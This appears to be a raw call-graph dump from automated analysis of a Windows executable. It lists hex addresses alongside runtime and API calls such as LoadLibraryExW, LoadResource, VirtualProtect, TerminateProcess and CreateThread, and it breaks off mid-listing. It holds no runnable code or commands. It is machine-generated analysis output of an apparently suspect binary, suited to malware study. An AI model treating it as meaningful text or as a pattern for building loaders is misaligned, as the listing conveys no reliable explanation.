109149->109152 109153 408047 59 API calls 109150->109153 109862 407cab 109152->109862 109157 46cc82 109153->109157 109869 464a31 GetFileAttributesW 109157->109869 109159 409837 84 API calls 109162 46cc5d 109159->109162 109165 407b2e 59 API calls 109162->109165 109163 46cc8b 109166 46cc9e 109163->109166 109169 4079f2 59 API calls 109163->109169 109165->109146 109168 409837 84 API calls 109166->109168 109176 46cca4 109166->109176 109171 46cccb 109168->109171 109169->109166 109870 4637ef 75 API calls Mailbox 109171->109870 109176->109143 109202 409837 84 API calls 109201->109202 109203 474494 109202->109203 110335 406240 109203->110335 109205 4744a4 109206 4744c9 109205->109206 109207 409ea0 341 API calls 109205->109207 109209 4744cd 109206->109209 110360 409a98 109206->110360 109207->109206 109209->108946 109210->108946 109212 47bc96 109211->109212 109213 47bcb0 109211->109213 110386 469e4a 89 API calls 4 library calls 109212->110386 110387 47a213 59 API calls Mailbox 109213->110387 109216 47bcbb 109217 409ea0 340 API calls 109216->109217 109218 47bd1c 109217->109218 109219 47bdae 109218->109219 109222 47bd5d 109218->109222 109244 47bca8 Mailbox 109218->109244 109220 47be04 109219->109220 109221 47bdb4 109219->109221 109223 409837 84 API calls 109220->109223 109220->109244 110389 46791a 59 API calls 109221->110389 110388 4672df 59 API calls Mailbox 109222->110388 109225 47be16 109223->109225 109228 407e4f 59 API calls 109225->109228 109226 47bdd7 110390 405d41 59 API calls Mailbox 109226->110390 109229 47be3a CharUpperBuffW 109228->109229 109234 47be54 109229->109234 109231 47bd8d 109233 40f460 340 API calls 109231->109233 109232 47bddf Mailbox 109237 40fce0 340 API calls 109232->109237 109233->109244 109235 47bea7 109234->109235 109236 47be5b 109234->109236 109238 409837 84 API calls 109235->109238 110391 4672df 59 API calls Mailbox 109236->110391 109237->109244 109239 47beaf 109238->109239 110392 409e5d 60 API calls 109239->110392 109242 47be89 109243 40f460 340 API calls 109242->109243 109243->109244 109244->108940 109245 47beb9 109245->109244 109246 409837 84 API calls 109245->109246 109247 47bed4 109246->109247 110393 405d41 59 API calls Mailbox 109247->110393 109249 47bee4 109250 40fce0 340 API calls 109249->109250 109250->109244 109251->108944 109252->109099 109253->109105 109254->109105 109255->109105 109257 409837 84 API calls 109256->109257 109258 47cb1a 109257->109258 109263 47cb61 Mailbox 109258->109263 109294 47d7a5 109258->109294 109260 47cf2e 109344 47d8c8 92 API calls Mailbox 109260->109344 109263->109111 109264 47cf3d 109265 47cdc7 109264->109265 109267 47cf49 109264->109267 109307 47c96e 109265->109307 109266 409837 84 API calls 109272 47cbb2 Mailbox 109266->109272 109267->109263 109272->109263 109272->109266 109281 47cdb9 109272->109281 109326 47fbce 59 API calls 2 library calls 109272->109326 109327 47cfdf 61 API calls 2 library calls 109272->109327 109273 47ce00 109322 420c08 109273->109322 109276 47ce33 109329 4092ce 109276->109329 109277 47ce1a 109328 469e4a 89 API calls 4 library calls 109277->109328 109280 47ce25 GetCurrentProcess TerminateProcess 109280->109276 109281->109260 109281->109265 109286 47cfa4 109286->109263 109290 47cfb8 FreeLibrary 109286->109290 109287 47ce6b 109341 47d649 107 API calls _free 109287->109341 109290->109263 109293 47ce7c 109293->109286 109342 408d40 59 API calls Mailbox 109293->109342 109343 409d3c 60 API calls Mailbox 109293->109343 109345 47d649 107 API calls _free 109293->109345 109295 407e4f 59 API calls 109294->109295 109296 47d7c0 CharLowerBuffW 109295->109296 109346 45f167 109296->109346 109300 407667 59 API calls 109301 47d7f9 109300->109301 109353 40784b 109301->109353 109303 47d858 Mailbox 109303->109272 109304 47d810 109366 407d2c 109304->109366 109306 47d81c Mailbox 109306->109303 109370 47cfdf 61 API calls 2 library calls 109306->109370 109308 47c989 109307->109308 109312 47c9de 109307->109312 109309 420db6 Mailbox 59 API calls 109308->109309 109311 47c9ab 109309->109311 109310 420db6 Mailbox 59 API calls 109310->109311 109311->109310 109311->109312 109313 47da50 109312->109313 109314 47dc79 Mailbox 109313->109314 109321 47da73 _strcat _wcscpy __wsetenvp 109313->109321 109314->109273 109315 409be6 59 API calls 109315->109321 109316 409b3c 59 API calls 109316->109321 109317 409b98 59 API calls 109317->109321 109318 409837 84 API calls 109318->109321 109319 42571c 58 API calls __crtLCMapStringA_stat 109319->109321 109321->109314 109321->109315 109321->109316 109321->109317 109321->109318 109321->109319 109377 465887 61 API calls 2 library calls 109321->109377 109324 420c1d 109322->109324 109323 420cb5 VirtualProtect 109325 420c83 109323->109325 109324->109323 109324->109325 109325->109276 109325->109277 109326->109272 109327->109272 109328->109280 109330 4092d6 109329->109330 109331 420db6 Mailbox 59 API calls 109330->109331 109332 4092e4 109331->109332 109333 4092f0 109332->109333 109378 4091fc 59 API calls Mailbox 109332->109378 109335 409050 109333->109335 109379 409160 109335->109379 109337 40905f 109338 420db6 Mailbox 59 API calls 109337->109338 109339 4090fb 109337->109339 109338->109339 109339->109293 109340 408d40 59 API calls Mailbox 109339->109340 109340->109287 109341->109293 109342->109293 109343->109293 109344->109264 109345->109293 109348 45f192 __wsetenvp 109346->109348 109347 45f1d1 109347->109300 109347->109306 109348->109347 109349 45f1c7 109348->109349 109350 45f278 109348->109350 109349->109347 109371 4078c4 61 API calls 109349->109371 109350->109347 109372 4078c4 61 API calls 109350->109372 109354 4078b7 109353->109354 109355 40785a 109353->109355 109356 407d2c 59 API calls 109354->109356 109355->109354 109357 407865 109355->109357 109358 407888 _memmove 109356->109358 109359 407880 109357->109359 109360 43eb09 109357->109360 109358->109304 109373 407f27 59 API calls Mailbox 109359->109373 109374 408029 109360->109374 109363 43eb13 109364 420db6 Mailbox 59 API calls 109363->109364 109365 43eb33 109364->109365 109367 407d43 _memmove 109366->109367 109368 407d3a 109366->109368 109367->109306 109368->109367 109369 407e4f 59 API calls 109368->109369 109369->109367 109370->109303 109371->109349 109372->109350 109373->109358 109375 420db6 Mailbox 59 API calls 109374->109375 109376 408033 109375->109376 109376->109363 109377->109321 109378->109333 109380 409169 Mailbox 109379->109380 109381 43f19f 109380->109381 109386 409173 109380->109386 109382 420db6 Mailbox 59 API calls 109381->109382 109384 43f1ab 109382->109384 109383 40917a 109383->109337 109386->109383 109387 409c90 59 API calls Mailbox 109386->109387 109387->109386 109389 464475 FindFirstFileW 109388->109389 109390 463c3e 109388->109390 109389->109390 109391 46448a FindClose 109389->109391 109390->108946 109391->109390 109393 4253b2 __wfsopen 109392->109393 109394 4253c6 109393->109394 109395 4253de 109393->109395 109427 428b28 58 API calls __getptd_noexit 109394->109427 109401 4253d6 __wfsopen 109395->109401 109405 426c11 109395->109405 109397 4253cb 109428 428db6 9 API calls __wfsopen 109397->109428 109401->109117 109406 426c43 EnterCriticalSection 109405->109406 109407 426c21 109405->109407 109409 4253f0 109406->109409 109407->109406 109408 426c29 109407->109408 109410 429c0b __lock 58 API calls 109408->109410 109411 42533a 109409->109411 109410->109409 109412 425349 109411->109412 109413 42535d 109411->109413 109473 428b28 58 API calls __getptd_noexit 109412->109473 109425 425359 109413->109425 109430 424a3d 109413->109430 109416 42534e 109474 428db6 9 API calls __wfsopen 109416->109474 109422 425377 109447 430a02 109422->109447 109424 42537d 109424->109425 109426 422d55 _free 58 API calls 109424->109426 109429 425415 LeaveCriticalSection LeaveCriticalSection __wfsopen 109425->109429 109426->109425 109427->109397 109428->109401 109429->109401 109431 424a50 109430->109431 109432 424a74 109430->109432 109431->109432 109433 4246e6 __ftell_nolock 58 API calls 109431->109433 109436 430b77 109432->109436 109434 424a6d 109433->109434 109475 42d886 109434->109475 109437 425371 109436->109437 109438 430b84 109436->109438 109440 4246e6 109437->109440 109438->109437 109439 422d55 _free 58 API calls 109438->109439 109439->109437 109441 4246f0 109440->109441 109442 424705 109440->109442 109617 428b28 58 API calls __getptd_noexit 109441->109617 109442->109422 109444 4246f5 109618 428db6 9 API calls __wfsopen 109444->109618 109446 424700 109446->109422 109448 430a0e __wfsopen 109447->109448 109449 430a32 109448->109449 109450 430a1b 109448->109450 109452 430abd 109449->109452 109454 430a42 109449->109454 109634 428af4 58 API calls __getptd_noexit 109450->109634 109639 428af4 58 API calls __getptd_noexit 109452->109639 109453 430a20 109635 428b28 58 API calls __getptd_noexit 109453->109635 109457 430a60 109454->109457 109458 430a6a 109454->109458 109636 428af4 58 API calls __getptd_noexit 109457->109636 109460 42d206 ___lock_fhandle 59 API calls 109458->109460 109459 430a65 109640 428b28 58 API calls __getptd_noexit 109459->109640 109463 430a70 109460->109463 109465 430a83 109463->109465 109466 430a8e 109463->109466 109464 430ac9 109641 428db6 9 API calls __wfsopen 109464->109641 109619 430add 109465->109619 109637 428b28 58 API calls __getptd_noexit 109466->109637 109469 430a27 __wfsopen 109469->109424 109471 430a89 109638 430ab5 LeaveCriticalSection __unlock_fhandle 109471->109638 109473->109416 109474->109425 109476 42d892 __wfsopen 109475->109476 109477 42d8b6 109476->109477 109478 42d89f 109476->109478 109480 42d955 109477->109480 109482 42d8ca 109477->109482 109576 428af4 58 API calls __getptd_noexit 109478->109576 109582 428af4 58 API calls __getptd_noexit 109480->109582 109481 42d8a4 109577 428b28 58 API calls __getptd_noexit 109481->109577 109485 42d8f2 109482->109485 109486 42d8e8 109482->109486 109503 42d206 109485->109503 109578 428af4 58 API calls __getptd_noexit 109486->109578 109487 42d8ed 109583 428b28 58 API calls __getptd_noexit 109487->109583 109490 42d8f8 109492 42d90b 109490->109492 109493 42d91e 109490->109493 109512 42d975 109492->109512 109579 428b28 58 API calls __getptd_noexit 109493->109579 109494 42d961 109584 428db6 9 API calls __wfsopen 109494->109584 109497 42d8ab __wfsopen 109497->109432 109499 42d917 109581 42d94d LeaveCriticalSection __unlock_fhandle 109499->109581 109500 42d923 109580 428af4 58 API calls __getptd_noexit 109500->109580 109504 42d212 __wfsopen 109503->109504 109505 42d261 EnterCriticalSection 109504->109505 109507 429c0b __lock 58 API calls 109504->109507 109506 42d287 __wfsopen 109505->109506 109506->109490 109508 42d237 109507->109508 109509 42d24f 109508->109509 109585 429e2b InitializeCriticalSectionAndSpinCount 109508->109585 109586 42d28b LeaveCriticalSection _doexit 109509->109586 109513 42d982 __ftell_nolock 109512->109513 109514 42d9e0 109513->109514 109515 42d9c1 109513->109515 109543 42d9b6 109513->109543 109519 42da38 109514->109519 109520 42da1c 109514->109520 109596 428af4 58 API calls __getptd_noexit 109515->109596 109518 42d9c6 109597 428b28 58 API calls __getptd_noexit 109518->109597 109523 42da51 109519->109523 109602 4318c1 60 API calls 3 library calls 109519->109602 109599 428af4 58 API calls __getptd_noexit 109520->109599 109521 42e1d6 109521->109499 109587 435c6b 109523->109587 109525 42d9cd 109598 428db6 9 API calls __wfsopen 109525->109598 109528 42da21 109600 428b28 58 API calls __getptd_noexit 109528->109600 109530 42da5f 109532 42ddb8 109530->109532 109603 4299ac 58 API calls 2 library calls 109530->109603 109534 42ddd6 109532->109534 109535 42e14b WriteFile 109532->109535 109533 42da28 109601 428db6 9 API calls __wfsopen 109533->109601 109538 42defa 109534->109538 109547 42ddec 109534->109547 109539 42ddab GetLastError 109535->109539 109545 42dd78 109535->109545 109549 42df05 109538->109549 109553 42dfef 109538->109553 109539->109545 109540 42da8b GetConsoleMode 109540->109532 109542 42daca 109540->109542 109541 42e184 109541->109543 109608 428b28 58 API calls __getptd_noexit 109541->109608 109542->109532 109546 42dada GetConsoleCP 109542->109546 109610 42c5f6 109543->109610 109545->109541 109545->109543 109552 42ded8 109545->109552 109546->109541 109562 42db09 109546->109562 109547->109541 109548 42de5b WriteFile 109547->109548 109548->109539 109550 42de98 109548->109550 109549->109541 109554 42df6a WriteFile 109549->109554 109550->109547 109571 42debc 109550->109571 109551 42e1b2 109609 428af4 58 API calls __getptd_noexit 109551->109609 109556 42dee3 109552->109556 109557 42e17b 109552->109557 109553->109541 109558 42e064 WideCharToMultiByte 109553->109558 109554->109539 109559 42dfb9 109554->109559 109605 428b28 58 API calls __getptd_noexit 109556->109605 109607 428b07 58 API calls 3 library calls 109557->109607 109558->109539 109569 42e0ab 109558->109569 109559->109545 109559->109549 109559->109571 109562->109545 109568 4362ba 60 API calls __write_nolock 109562->109568 109572 42dbf2 WideCharToMultiByte 109562->109572 109575 42dc5f 109562->109575 109604 4235f5 58 API calls __isleadbyte_l 109562->109604 109563 42e0b3 WriteFile 109566 42e106 GetLastError 109563->109566 109563->109569 109564 42dee8 109606 428af4 58 API calls __getptd_noexit 109564->109606 109566->109569 109568->109562 109569->109545 109569->109553 109569->109563 109569->109571 109570 437a5e WriteConsoleW CreateFileW __putwch_nolock 109570->109575 109571->109545 109572->109545 109573 42dc2d WriteFile 109572->109573 109573->109539 109573->109575 109574 42dc87 WriteFile 109574->109539 109574->109575 109575->109539 109575->109545 109575->109562 109575->109570 109575->109574 109576->109481 109577->109497 109578->109487 109579->109500 109580->109499 109581->109497 109582->109487 109583->109494 109584->109497 109585->109509 109586->109505 109588 435c83 109587->109588 109589 435c76 109587->109589 109591 435c8f 109588->109591 109592 428b28 __wfsopen 58 API calls 109588->109592 109590 428b28 __wfsopen 58 API calls 109589->109590 109593 435c7b 109590->109593 109591->109530 109594 435cb0 109592->109594 109593->109530 109595 428db6 __wfsopen 9 API calls 109594->109595 109595->109593 109596->109518 109597->109525 109598->109543 109599->109528 109600->109533 109601->109543 109602->109523 109603->109540 109604->109562 109605->109564 109606->109543 109607->109543 109608->109551 109609->109543 109611 42c600 IsProcessorFeaturePresent 109610->109611 109612 42c5fe 109610->109612 109614 43590a 109611->109614 109612->109521 109615 4358b9 ___raise_securityfailure 5 API calls 109614->109615 109616 4359ed 109615->109616 109616->109521 109617->109444 109618->109446 109642 42d4c3 109619->109642 109621 430b41 109655 42d43d 59 API calls 2 library calls 109621->109655 109623 430aeb 109623->109621 109624 430b1f 109623->109624 109626 42d4c3 __commit 58 API calls 109623->109626 109624->109621 109627 42d4c3 __commit 58 API calls 109624->109627 109625 430b49 109628 430b6b 109625->109628 109656 428b07 58 API calls 3 library calls 109625->109656 109629 430b16 109626->109629 109630 430b2b CloseHandle 109627->109630 109628->109471 109633 42d4c3 __commit 58 API calls 109629->109633 109630->109621 109631 430b37 GetLastError 109630->109631 109631->109621 109633->109624 109634->109453 109635->109469 109636->109459 109637->109471 109638->109469 109639->109459 109640->109464 109641->109469 109643 42d4e3 109642->109643 109644 42d4ce 109642->109644 109649 42d508 109643->109649 109659 428af4 58 API calls __getptd_noexit 109643->109659 109657 428af4 58 API calls __getptd_noexit 109644->109657 109646 42d4d3 109658 428b28 58 API calls __getptd_noexit 109646->109658 109649->109623 109650 42d512 109660 428b28 58 API calls __getptd_noexit 109650->109660 109651 42d4db 109651->109623 109653 42d51a 109661 428db6 9 API calls __wfsopen 109653->109661 109655->109625 109656->109628 109657->109646 109658->109651 109659->109650 109660->109653 109661->109651 109880 404bb5 109662->109880 109667 43d8e6 109670 404e4a 84 API calls 109667->109670 109668 404e08 LoadLibraryExW 109890 404b6a 109668->109890 109672 43d8ed 109670->109672 109674 404b6a 3 API calls 109672->109674 109676 43d8f5 109674->109676 109675 404e2f 109675->109676 109677 404e3b 109675->109677 109916 404f0b 109676->109916 109678 404e4a 84 API calls 109677->109678 109681 404e40 109678->109681 109681->109137 109683 43d91c 109924 404ec7 109683->109924 109859 409b52 109858->109859 109860 409b4d 109858->109860 109859->109126 109860->109859 110328 42358a 59 API calls 109860->110328 109863 43ed4a 109862->109863 109864 407cbf 109862->109864 109866 408029 59 API calls 109863->109866 110329 407c50 109864->110329 109868 43ed55 __wsetenvp _memmove 109866->109868 109867 407cca 109867->109159 109869->109163 109870->109176 109929 404c03 109880->109929 109883 404bdc 109884 404bf5 109883->109884 109885 404bec FreeLibrary 109883->109885 109887 42525b 109884->109887 109885->109884 109886 404c03 2 API calls 109886->109883 109933 425270 109887->109933 109889 404dfc 109889->109667 109889->109668 110014 404c36 109890->110014 109893 404b8f 109894 404ba1 FreeLibrary 109893->109894 109895 404baa 109893->109895 109894->109895 109897 404c70 109895->109897 109896 404c36 2 API calls 109896->109893 109898 420db6 Mailbox 59 API calls 109897->109898 109899 404c85 109898->109899 110018 40522e 109899->110018 109901 404c91 _memmove 109902 404ccc 109901->109902 109904 404dc1 109901->109904 109905 404d89 109901->109905 109903 404ec7 69 API calls 109902->109903 109913 404cd5 109903->109913 110032 46991b 95 API calls 109904->110032 110021 404e89 CreateStreamOnHGlobal 109905->110021 109908 404f0b 74 API calls 109908->109913 109910 404d69 109910->109675 109911 43d8a7 109912 404ee5 85 API calls 109911->109912 109914 43d8bb 109912->109914 109913->109908 109913->109910 109913->109911 110027 404ee5 109913->110027 109915 404f0b 74 API calls 109914->109915 109915->109910 109917 404f1d 109916->109917 109920 43d9cd 109916->109920 110050 4255e2 109917->110050 109921 469109 110175 468f5f 109921->110175 109923 46911f 109923->109683 109925 43d990 109924->109925 109926 404ed6 109924->109926 110180 425c60 109926->110180 109930 404bd0 109929->109930 109931 404c0c LoadLibraryA 109929->109931 109930->109883 109930->109886 109931->109930 109932 404c1d GetProcAddress 109931->109932 109932->109930 109935 42527c __wfsopen 109933->109935 109934 42528f 109982 428b28 58 API calls __getptd_noexit 109934->109982 109935->109934 109938 4252c0 109935->109938 109937 425294 109983 428db6 9 API calls __wfsopen 109937->109983 109952 4304e8 109938->109952 109941 4252c5 109942 4252db 109941->109942 109943 4252ce 109941->109943 109945 425305 109942->109945 109946 4252e5 109942->109946 109984 428b28 58 API calls __getptd_noexit 109943->109984 109967 430607 109945->109967 109985 428b28 58 API calls __getptd_noexit 109946->109985 109951 42529f __wfsopen @_EH4_CallFilterFunc@8 109951->109889 109953 4304f4 __wfsopen 109952->109953 109954 429c0b __lock 58 API calls 109953->109954 109965 430502 109954->109965 109955 430576 109987 4305fe 109955->109987 109956 43057d 109992 42881d 58 API calls 2 library calls 109956->109992 109959 430584 109959->109955 109993 429e2b InitializeCriticalSectionAndSpinCount 109959->109993 109960 4305f3 __wfsopen 109960->109941 109962 429c93 __mtinitlocknum 58 API calls 109962->109965 109964 4305aa EnterCriticalSection 109964->109955 109965->109955 109965->109956 109965->109962 109990 426c50 59 API calls __lock 109965->109990 109991 426cba LeaveCriticalSection LeaveCriticalSection _doexit 109965->109991 109968 430627 __wopenfile 109967->109968 109969 430641 109968->109969 109981 4307fc 109968->109981 110000 4237cb 60 API calls 2 library calls 109968->110000 109998 428b28 58 API calls __getptd_noexit 109969->109998 109971 430646 109999 428db6 9 API calls __wfsopen 109971->109999 109973 425310 109986 425332 LeaveCriticalSection LeaveCriticalSection __wfsopen 109973->109986 109974 43085f 109995 4385a1 109974->109995 109977 4307f5 109977->109981 110001 4237cb 60 API calls 2 library calls 109977->110001 109979 430814 109979->109981 110002 4237cb 60 API calls 2 library calls 109979->110002 109981->109969 109981->109974 109982->109937 109983->109951 109984->109951 109985->109951 109986->109951 109994 429d75 LeaveCriticalSection 109987->109994 109989 430605 109989->109960 109990->109965 109991->109965 109992->109959 109993->109964 109994->109989 110003 437d85 109995->110003 109997 4385ba 109997->109973 109998->109971 109999->109973 110000->109977 110001->109979 110002->109981 110006 437d91 __wfsopen 110003->110006 110004 437da7 110005 428b28 __wfsopen 58 API calls 110004->110005 110007 437dac 110005->110007 110006->110004 110008 437ddd 110006->110008 110010 428db6 __wfsopen 9 API calls 110007->110010 110009 437e4e __wsopen_nolock 109 API calls 110008->110009 110011 437df9 110009->110011 110013 437db6 __wfsopen 110010->110013 110012 437e22 __wsopen_helper LeaveCriticalSection 110011->110012 110012->110013 110013->109997 110015 404b83 110014->110015 110016 404c3f LoadLibraryA 110014->110016 110015->109893 110015->109896 110016->110015 110017 404c50 GetProcAddress 110016->110017 110017->110015 110019 420db6 Mailbox 59 API calls 110018->110019 110020 405240 110019->110020 110020->109901 110022 404ea3 FindResourceExW 110021->110022 110026 404ec0 110021->110026 110023 43d933 LoadResource 110022->110023 110022->110026 110024 43d948 SizeofResource 110023->110024 110023->110026 110025 43d95c LockResource 110024->110025 110024->110026 110025->110026 110026->109902 110028 404ef4 110027->110028 110029 43d9ab 110027->110029 110033 42584d 110028->110033 110032->109902 110037 425859 __wfsopen 110033->110037 110034 42586b 110036 425891 110037->110034 110037->110036 110053 4255fd 110050->110053 110052 404f2e 110052->109921 110055 425609 __wfsopen 110053->110055 110054 425644 __wfsopen 110054->110052 110055->110054 110056 42561f _memset 110055->110056 110057 42564c 110055->110057 110080 428b28 58 API calls __getptd_noexit 110056->110080 110058 426c11 __lock_file 59 API calls 110057->110058 110059 425652 110058->110059 110066 42541d 110059->110066 110061 425639 110081 428db6 9 API calls __wfsopen 110061->110081 110070 425438 _memset 110066->110070 110072 425453 110066->110072 110067 425443 110171 428b28 58 API calls __getptd_noexit 110067->110171 110069 425448 110172 428db6 9 API calls __wfsopen 110069->110172 110070->110067 110070->110072 110077 425493 110070->110077 110082 425686 LeaveCriticalSection LeaveCriticalSection __wfsopen 110072->110082 110074 4255a4 _memset 110174 428b28 58 API calls __getptd_noexit 110074->110174 110075 4246e6 __ftell_nolock 58 API calls 110075->110077 110077->110072 110077->110074 110077->110075 110083 430e5b 110077->110083 110151 430ba7 110077->110151 110173 430cc8 58 API calls 3 library calls 110077->110173 110080->110061 110081->110054 110082->110054 110084 430e93 110083->110084 110085 430e7c 110083->110085 110087 4315cb 110084->110087 110091 430ecd 110084->110091 110086 428af4 __lseeki64 58 API calls 110085->110086 110088 430e81 110086->110088 110089 428af4 __lseeki64 58 API calls 110087->110089 110090 428b28 __wfsopen 58 API calls 110088->110090 110092 4315d0 110089->110092 110095 430e88 110090->110095 110093 430ed5 110091->110093 110101 430eec 110091->110101 110094 428b28 __wfsopen 58 API calls 110092->110094 110096 428af4 __lseeki64 58 API calls 110093->110096 110095->110077 110100 430f01 110101->110095 110101->110100 110103 430f1b 110101->110103 110105 430f39 110101->110105 110103->110100 110152 430bb2 110151->110152 110155 430bc7 110151->110155 110153 428b28 __wfsopen 58 API calls 110152->110153 110154 430bb7 110153->110154 110156 428db6 __wfsopen 9 API calls 110154->110156 110157 430bfc 110155->110157 110158 435fe4 __getbuf 58 API calls 110155->110158 110162 430bc2 110155->110162 110156->110162 110159 4246e6 __ftell_nolock 58 API calls 110157->110159 110158->110157 110160 430c10 110159->110160 110162->110077 110171->110069 110172->110072 110173->110077 110174->110069 110178 42520a GetSystemTimeAsFileTime 110175->110178 110177 468f6e 110177->109923 110179 425238 __aulldiv 110178->110179 110179->110177 110328->109859 110330 407c5f __wsetenvp 110329->110330 110331 408029 59 API calls 110330->110331 110332 407c70 _memmove 110330->110332 110333 43ed07 _memmove 110331->110333 110332->109867 110373 407a16 110335->110373 110337 40646a 110380 40750f 59 API calls 2 library calls 110337->110380 110339 406484 Mailbox 110339->109205 110342 43dff6 110383 45f8aa 91 API calls 4 library calls 110342->110383 110343 407d8c 59 API calls 110354 406265 110343->110354 110344 40750f 59 API calls 110344->110354 110348 43e004 110384 40750f 59 API calls 2 library calls 110348->110384 110350 43e01a 110350->110339 110351 406799 _memmove 110385 45f8aa 91 API calls 4 library calls 110351->110385 110352 43df92 110353 408029 59 API calls 110352->110353 110355 43df9d 110353->110355 110354->110337 110354->110342 110354->110343 110354->110344 110354->110351 110354->110352 110357 407e4f 59 API calls 110354->110357 110378 405f6c 60 API calls 110354->110378 110379 405d41 59 API calls Mailbox 110354->110379 110381 405e72 60 API calls 110354->110381 110382 407924 59 API calls 2 library calls 110354->110382 110359 420db6 Mailbox 59 API calls 110355->110359 110358 40643b CharUpperBuffW 110357->110358 110358->110354 110359->110351 110361 43f7d6 110360->110361 110362 409aa8 110360->110362 110363 43f7e7 110361->110363 110364 407bcc 59 API calls 110361->110364 110367 420db6 Mailbox 59 API calls 110362->110367 110365 407d8c 59 API calls 110363->110365 110364->110363 110366 43f7f1 110365->110366 110370 407667 59 API calls 110366->110370 110372 409ad4 110366->110372 110368 409abb 110367->110368 110368->110366 110369 409ac6 110368->110369 110371 407de1 59 API calls 110369->110371 110369->110372 110370->110372 110371->110372 110372->109209 110374 420db6 Mailbox 59 API calls 110373->110374 110375 407a3b 110374->110375 110376 408029 59 API calls 110375->110376 110377 407a4a 110376->110377 110377->110354 110378->110354 110379->110354 110380->110339 110381->110354 110382->110354 110383->110348 110384->110350 110385->110339 110386->109244 110387->109216 110388->109231 110389->109226 110390->109232 110391->109242 110392->109245 110393->109249 110394->108964 110395->108967 110396->108848 110397->108848 110398->108850 110399->108851 110400->108842 110401->108851 110402->108879 110403 2f5aaf0 110404 2f5ab06 110403->110404 110408 2f5ab57 110404->110408 110409 2f56490 110404->110409 110411 2f55f10 110409->110411 110412 2f55d90 110409->110412 110410 2f56084 SetFilePointerEx 110410->110411 110411->110410 110411->110412 110413 2f8faf0 110412->110413 110414 2f8fafd 110413->110414 110418 2f8fb84 110413->110418 110417 2f8fb2a 110414->110417 110414->110418 110416 2f908d6 110416->110408 110419 2f9032f 110417->110419 110432 2f91a1b 21 API calls 2 library calls 110417->110432 110420 2f8fc05 110418->110420 110424 2f8fbda 110418->110424 110419->110408 110423 2f8fc38 110420->110423 110431 2f90fe0 21 API calls __startOneArgErrorHandling 110420->110431 110422 2f8fc22 110422->110408 110423->110408 110424->110423 110425 2f9116e 110424->110425 110426 2f91167 110424->110426 110434 2f90fe0 21 API calls __startOneArgErrorHandling 110425->110434 110433 2f90ff7 21 API calls __startOneArgErrorHandling 110426->110433 110429 2f9116c 110429->110408 110430 2f91173 110430->110408 110431->110422 110432->110416 110433->110429 110434->110430 110435 401066 110440 40f76f 110435->110440 110437 40106c 110438 422d40 __cinit 67 API calls 110437->110438 110439 401076 110438->110439 110441 40f790 110440->110441 110473 41ff03 110441->110473 110445 40f7d7 110446 407667 59 API calls 110445->110446 110447 40f7e1 110446->110447 110448 407667 59 API calls 110447->110448 110449 40f7eb 110448->110449 110450 407667 59 API calls 110449->110450 110451 40f7f5 110450->110451 110452 407667 59 API calls 110451->110452 110453 40f833 110452->110453 110454 407667 59 API calls 110453->110454 110455 40f8fe 110454->110455 110483 415f87 110455->110483 110459 40f930 110460 407667 59 API calls 110459->110460 110461 40f93a 110460->110461 110511 41fd9e 110461->110511 110463 40f981 110464 40f991 GetStdHandle 110463->110464 110465 40f9dd 110464->110465 110466 4445ab 110464->110466 110467 40f9e5 OleInitialize 110465->110467 110466->110465 110468 4445b4 110466->110468 110467->110437 110518 466b38 64 API calls Mailbox 110468->110518 110470 4445bb 110519 467207 CreateThread 110470->110519 110472 4445c7 CloseHandle 110472->110467 110520 41ffdc 110473->110520 110476 41ffdc 59 API calls 110477 41ff45 110476->110477 110478 407667 59 API calls 110477->110478 110479 41ff51 110478->110479 110480 407bcc 59 API calls 110479->110480 110481 40f796 110480->110481 110482 420162 6 API calls 110481->110482 110482->110445 110484 407667 59 API calls 110483->110484 110485 415f97 110484->110485 110486 407667 59 API calls 110485->110486 110487 415f9f 110486->110487 110527 415a9d 110487->110527 110490 415a9d 59 API calls 110491 415faf 110490->110491 110492 407667 59 API calls 110491->110492 110493 415fba 110492->110493 110494 420db6 Mailbox 59 API calls 110493->110494 110495 40f908 110494->110495 110496 4160f9 110495->110496 110497 416107 110496->110497 110498 407667 59 API calls 110497->110498 110499 416112 110498->110499 110500 407667 59 API calls 110499->110500 110501 41611d 110500->110501 110502 407667 59 API calls 110501->110502 110503 416128 110502->110503 110504 407667 59 API calls 110503->110504 110505 416133 110504->110505 110506 415a9d 59 API calls 110505->110506 110507 41613e 110506->110507 110508 420db6 Mailbox 59 API calls 110507->110508 110509 416145 RegisterWindowMessageW 110508->110509 110509->110459 110512 45576f 110511->110512 110513 41fdae 110511->110513 110530 469ae7 60 API calls 110512->110530 110515 420db6 Mailbox 59 API calls 110513->110515 110516 41fdb6 110515->110516 110516->110463 110517 45577a 110518->110470 110519->110472 110531 4671ed 65 API calls 110519->110531 110521 407667 59 API calls 110520->110521 110522 41ffe7 110521->110522 110523 407667 59 API calls 110522->110523 110524 41ffef 110523->110524 110525 407667 59 API calls 110524->110525 110526 41ff3b 110525->110526 110526->110476 110528 407667 59 API calls 110527->110528 110529 415aa5 110528->110529 110529->110490 110530->110517 110532 40552a 110539 405ab8 110532->110539 110538 40555a Mailbox 110540 420db6 Mailbox 59 API calls 110539->110540 110541 405acb 110540->110541 110542 420db6 Mailbox 59 API calls 110541->110542 110543 40553c 110542->110543 110544 4054d2 110543->110544 110558 4058cf 110544->110558 110548 405514 110548->110538 110550 408061 MultiByteToWideChar 110548->110550 110549 4054e3 110549->110548 110565 405bc0 110549->110565 110571 405a7a 110549->110571 110551 408087 110550->110551 110552 4080ce 110550->110552 110554 420db6 Mailbox 59 API calls 110551->110554 110553 407d8c 59 API calls 110552->110553 110557 4080c0 110553->110557 110555 40809c MultiByteToWideChar 110554->110555 110588 40774d 110555->110588 110557->110538 110559 4058e0 110558->110559 110560 43dc3c 110558->110560 110559->110549 110580 455ecd 59 API calls Mailbox 110560->110580 110562 43dc46 110563 420db6 Mailbox 59 API calls 110562->110563 110564 43dc52 110563->110564 110566 405c33 110565->110566 110570 405bce 110565->110570 110581 405c4e SetFilePointerEx 110566->110581 110568 405bf6 110568->110549 110569 405c06 ReadFile 110569->110568 110569->110570 110570->110568 110570->110569 110572 43dcee 110571->110572 110573 405a8e 110571->110573 110587 455ecd 59 API calls Mailbox 110572->110587 110582 4059b9 110573->110582 110576 405a9a 110576->110549 110577 43dcf9 110578 420db6 Mailbox 59 API calls 110577->110578 110579 43dd0e _memmove 110578->110579 110580->110562 110581->110570 110583 4059d1 110582->110583 110586 4059ca _memmove 110582->110586 110584 43dc7e 110583->110584 110585 420db6 Mailbox 59 API calls 110583->110585 110585->110586 110586->110576 110587->110577 110589 40775c 110588->110589 110590 4077cf 110588->110590 110589->110590 110592 407768 110589->110592 110591 407d2c 59 API calls 110590->110591 110597 40777a _memmove 110591->110597 110593 